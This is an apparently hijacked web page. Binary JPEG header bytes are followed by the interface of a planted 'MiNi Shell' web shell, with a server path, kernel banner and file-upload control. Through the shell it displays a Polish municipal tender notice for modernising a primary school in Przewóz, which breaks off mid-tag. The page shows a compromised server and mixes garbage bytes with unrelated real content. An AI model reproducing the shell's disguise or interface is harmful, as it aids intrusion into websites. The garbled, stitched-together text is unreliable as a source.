JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240813/0045586801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja budynku i placu apelowego Szkoły Podstawowej w Przewozie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Przewóz</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Referat Gospodarki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970770652</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Partyzantów 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przewóz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">68-132</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">683623279</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@przewoz.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://przewoz.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja budynku i placu apelowego Szkoły Podstawowej w Przewozie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b4566279-9357-4e72-aea4-a409ee59d6d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00455868</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00047748/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Modernizacja budynku i placu apelowego Szkoły Podstawowej w Przewozie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b4566279-9357-4e72-aea4-a409ee59d6d2 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Przedmiotowe postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej. <br/>Składanie ofert następuje za pośrednictwem platformy zakupowej dostępnej pod adresem internetowym: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2.	W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy zakupowej, dostępnej pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1)	administratorem Pani/Pana danych osobowych jest: Wójt Gminy Przewóz (dalej Administrator),<br/>2)	administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@bhpex.pl</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">10)	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RG.272.3.1.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Inwestycja realizowana na podstawie wstępnej promesy Banku Gospodarstwa Krajowego -dofinansowanie z rządowego funduszu Polski Ład Program Inwestycji Strategicznych Edycja 8/2023/1645/PolskiLad<br/><br/>Na zadanie składa się poniższe zestawienie prac od nr 1 do 9 tj:<br/><br/>1.	Remont nawierzchni placu apelowego na podstawie projektu architektoniczno-budowlanego Daniel Sznajder Projekt i Nadzór Budowlany.<br/>W ramach zagospodarowania terenu projektuje się remont istniejącej nawierzchni utwardzonej placu apelowego oraz dojść i dojazdów przy szkole.<br/>Powierzchnia terenu utwardzonego do remontu- 1292 m2 <br/>Zakres prac przygotowawczych obejmuje rozbiórkę istniejącej nawierzchni utwardzonej wykonanej z płyt betonowych chodnikowych oraz rozbiórkę istniejącej nawierzchni betonowej.<br/>Projektowane warstwy nawierzchni:<br/>-warstwa odsączająca z piasku -gr. 10 cm<br/>- warstwa konstrukcyjna z kruszywa łamanego o frakcji 31,5-63 mm -gr. 15 cm<br/>-warstwa podsypki cementowo-piaskowej lub bazaltu drobnego 0-2mm – gr.5 cm<br/>-nawierzchnia z kostki brukowej betonowej fazowanej o grubości 8 cm na podsypce cementowo-piaskowej<br/>Szczegółowy opis zawiera kosztorys ofertowy stanowiący instrument pomocniczy w ustaleniu ceny ryczałtowej.<br/><br/><br/>2.	Modernizacja instalacji sanitarnych -grzewczej i wodociągowej na podstawie projektu technicznego TRIMtech Technika Instalacji<br/>W ramach zadania należy wykonać:<br/>a)	Technologię źródła ciepła poprzez kaskadę kondensacyjnych kotłów na paliwo stałe o łącznej mocy do 256 kW (UWAGA zastosowanie modelu kotła wg. dokumentacji projektowej. Zamawiający dopuszcza rozwiązania równoważne z uwzględnieniem konieczności osiągania przez oferenta przyjętych parametrów projektowych)<br/>Ogrzewanie w budynku zostanie zapewnione poprzez instalację centralnego ogrzewania z grzejnikami płytowymi. Rurociągi instalacji centralnego ogrzewania wraz z izolacją cieplną -zgodnie z projektem technicznym.<br/>b)	Instalacja wodociągowa -należy wykonać w istniejących kanałach technicznych w posadzce lub pod stropem z rur stalowych ocynkowanych. Ciepła woda użytkowa przygotowana będzie poprzez podgrzewacze elektryczne pojemnościowe.<br/>Szczegółowy opis zawiera zestawienie materiałów wraz z przedmiarem stanowiącym instrument pomocniczy w ustaleniu ceny ryczałtowej.<br/><br/>c)	Modernizacja instalacji sanitarnych -grzewczej i wodociągowej wg. przedmiaru KNR studio ul. Bukowska 18 A/32 60-811 Poznań<br/><br/>UWAGA: Zamawiający w zakresie nieobjętym powyższą dokumentacją wskazuje do uwzględnienia w cenie ryczałtowej doprowadzenie instalacji wodociągowej do sali nr 20. <br/><br/><br/> <br/>3.	Modernizacja instalacji elektrycznych na podstawie projektu technicznego TRIMtech Technika Instalacji poprzez: montaż instalacji wewnętrznej siły i oświetlenia oraz wykonanie pomiarów kontrolnych i załączenia napięcia w obiekcie. Zadanie obejmuje: demontaż istniejących instalacji, montaż rozdzielnic elektrycznych, instalacji siłowej, zasilania urządzeń sanitarnych, instalację oświetlenia podstawowego i awaryjnego, ochronę przeciwpożarową, ochronę przepięciową i przeciwporażeniową<br/>Szczegółowy opis zawiera przedmiar stanowiącym instrument pomocniczy w ustaleniu ceny ryczałtowej.<br/><br/><br/>4.	Modernizacja instalacji elektrycznej oraz grzewczej w budynku sali gimnastycznej przy Szkole Podstawowej w Przewozie na podstawie programu funkcjonalno-użytkowego ELNOW Krzysztof Nowecki<br/><br/>Przedmiot zadania obejmuje: <br/>-opracowanie dokumentacji projektowej na wykonanie instalacji elektrycznej gniazdowej w budynku szkoły<br/>-opracowanie dokumentacji projektowej na przebudowę instalacji elektrycznej oraz modernizacji ogrzewania w sali gimnastycznej<br/>-opracowanie dokumentacji projektowej i montaż paneli fotowoltaicznych, w tym ekspertyzy nośności dachu<br/>-uzyskanie uzgodnień, opinii i pozwoleń wynikających z przepisów prawa<br/>-demontaż istniejącej instalacji centralnego ogrzewania<br/>-wykonanie robót budowlanych, instalacyjnych oraz montażowych<br/>-wykonanie czynności odbiorowych <br/>-wykonanie dokumentacji powykonawczej<br/>-uruchomienie instalacji oraz wykonanie instrukcji eksploatacji<br/><br/><br/><br/>5.	Roboty malarskie poprzez:<br/><br/>a) malowanie ścian<br/>-przygotowanie powierzchni pod malowanie ścian wraz z poszpachlowaniem nierówności, gruntowanie powierzchni, dwukrotne malowanie ścian farbą ceramiczną o klasie 1 odporności na szorowanie o wykończeniu matowym:<br/>klasa nr 3 – 154 m2<br/>klasa nr 4 – 154 m2<br/>klasa nr 5 – 154 m2<br/>klasa nr 6 – 154 m2<br/>klasa nr 13 – 154 m2 <br/>klasa nr 14 – 154 m2<br/>klasa nr 15 – 154 m2<br/>klasa nr 16 – 154 m2<br/>klasa nr 1 – 182 m2<br/>klasa nr 20 – 182 m2<br/>klasa nr 19 -187 m2<br/>klasa nr 2 -217 m2<br/>klasa nr 17 -217 m2<br/>aula nr 9 -241 m2<br/>RAZEM: 2458 m2<br/><br/>b)	malowanie sufitów<br/> - przygotowanie powierzchni pod malowanie sufitów wraz z poszpachlowaniem <br/> nierówności, dwukrotne malowanie farbami emulsyjnymi -barwa biała<br/><br/>klasa nr 3 – 44 m2<br/>klasa nr 4 – 44 m2<br/>klasa nr 5 – 44 m2<br/>klasa nr 6 – 44 m2<br/>klasa nr 13 – 44 m2 <br/>klasa nr 14 – 44 m2<br/>klasa nr 15 – 44 m2<br/>klasa nr 16 – 44 m2<br/>klasa nr 1 – 52 m2<br/>klasa nr 20 – 52 m2<br/>klasa nr 19 -53,36 m2<br/>klasa nr 2 -62,08 m2<br/>klasa nr 17 -62,08 m2<br/>aula nr 9 -68,67 m2<br/>RAZEM: 702,19 m2<br/><br/><br/><br/>6.	Dostawa i montaż garażu blaszanego ( uwaga dopuszczalna tolerancja w zakresie wymiarów do + 1m, nie dotyczy parametrów wysokości całkowitej)<br/> garaż blaszany o szerokości min. 5,00 m i długości min. 5,00 m. Brama uchylna podnoszona<br/> do góry z przetłoczeniami blachy POZIOMO (przetłoczenia szerokości około 20 cm). <br/> Wysokość wjazdu 1,95 m. Dach dwuspadowy, wysokość całkowita w szczycie 2,65 m, <br/> wysokość ścian bocznych 2,13 m. Ściany i dach z blachy na rąbek stojący, kolor ciemny<br/> do akceptacji. Konstrukcja ścian wzmocniona profilami zamkniętymi 30x30<br/> ocynkowanymi. <br/><br/><br/><br/><br/>7.	Wykonanie posadzek poprzez:<br/>-rozebranie istniejących posadzek, wywiezienie gruzu wraz z utylizacją, zasypanie kanałów istniejących i zagęszczenie podłoża (dotyczy korytarzy), zalanie warstwy wyrównującej do wysokości chudziaka miejsc po kanałach, położenie izolacji przeciwwilgociowej z foli 0,3 cm na chudziaka, zalanie posadzki jastrychowej o grubości od 5 do 7 cm <br/><br/><br/>Wymiary:<br/>a)	korytarze łącznie 282,50 m2 ( piętro, parter, hol przy pok.19 i 20, hol przy sekretariacie i pok. „1”,hol przy bibliotece)<br/><br/>b) sale lekcyjne/inne<br/>klasa nr 3 – 44 m2<br/>klasa nr 4 – 44 m2<br/>klasa nr 5 – 44 m2<br/>klasa nr 6 – 44 m2<br/>klasa nr 13 – 44 m2 <br/>klasa nr 14 – 44 m2<br/>klasa nr 15 – 44 m2<br/>klasa nr 16 – 44 m2<br/>klasa nr 1 – 52 m2<br/>klasa nr 20 – 52 m2<br/>klasa nr 19 -53,36 m2<br/>klasa nr 2 -62,08 m2<br/>klasa nr 17 -62,08 m2<br/>aula nr 9 -68,67 m2<br/>gabinet logopedy (nr 7) – 22,80<br/>gabinet pedagoga (nr 8) – 22,80<br/>RAZEM: 747,79 m2<br/><br/><br/>8. Dostawa i montaż homogenicznych wykładzin winylowych Norma Primo Plus (lub równoważne) o grubości całkowitej 2,00 mm na powierzchni, preferowany kolor wykładziny: optima-beige-0850<br/><br/>a)	korytarze łącznie 282,50 m2 ( piętro, parter, hol przy pok.19 i 20, hol przy sekretariacie i pok. „1”,hol przy bibliotece)<br/><br/>b) sale lekcyjne/inne<br/>klasa nr 3 – 44 m2<br/>klasa nr 4 – 44 m2<br/>klasa nr 5 – 44 m2<br/>klasa nr 6 – 44 m2<br/>klasa nr 13 – 44 m2 <br/>klasa nr 14 – 44 m2<br/>klasa nr 15 – 44 m2<br/>klasa nr 16 – 44 m2<br/>klasa nr 1 – 52 m2<br/>klasa nr 20 – 52 m2<br/>klasa nr 19 -53,36 m2<br/>klasa nr 2 -62,08 m2<br/>klasa nr 17 -62,08 m2<br/>aula nr 9 -68,67 m2<br/>gabinet logopedy (nr 7) – 22,80<br/>gabinet pedagoga (nr 8) – 22,80<br/>RAZEM: 747,79 m2<br/><br/><br/>9.	Wymiana drzwi na nowe wg. zestawienia fotograficznego – szt. 6<br/>Preferowane odtworzenie dotychczasowego stosunku powierzchni szklanych do zabudowanych oraz zastosowanego materiału – do weryfikacji podczas obligatoryjnej wizji lokalnej przed złożeniem oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45232100-3 - Roboty pomocnicze w zakresie wodociągów</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">44510000-8 - Narzędzia</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">zgodnie z kryteriami</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">warunki gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Obligatoryjnie : oświadczenie o niepodleganiu wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r., poz. 835).<br/>Wykonawca spełni warunek jeżeli wykaże, że w okresie 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał :<br/><br/>co najmniej jedną robotę budowlaną zrealizowaną w ramach jednej umowy, o wartości co najmniej 2 000 000 zł netto, obejmującą budowę lub przebudowę obiektu użyteczności publicznej<br/><br/>W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia lub polegania na zdolnościach podmiotów udostępniających zasoby w/w warunek musi spełnić:<br/>- jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia lub podmiot udostępniający zasoby w pełnym zakresie.<br/>3.	Wykonawca spełni ten warunek jeżeli wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia tj. <br/><br/>	kierownikiem budowy - min. jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanym w branży sanitarnej<br/>	kierownikiem robót- min. jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanym w branży budowlanej bez ograniczeń<br/>	kierownikiem robót- min. jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanym w branży elektrycznej bez ograniczeń <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">zgodnie ze SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">zgodnie ze SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 7.	Przed podpisaniem umowy Wykonawca, który złożył najkorzystniejszą ofertę przedłoży Zamawiającemu następujące dokumenty: <br/>1) wypełniony przedmiar, sporządzony wg zestawienia rzeczowego (dotyczy pozycji wyspecyfikowanych w przedmiarach)<br/>2) kopię aktualnej polisy ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności gospodarczej <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> zgodnie ze SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span 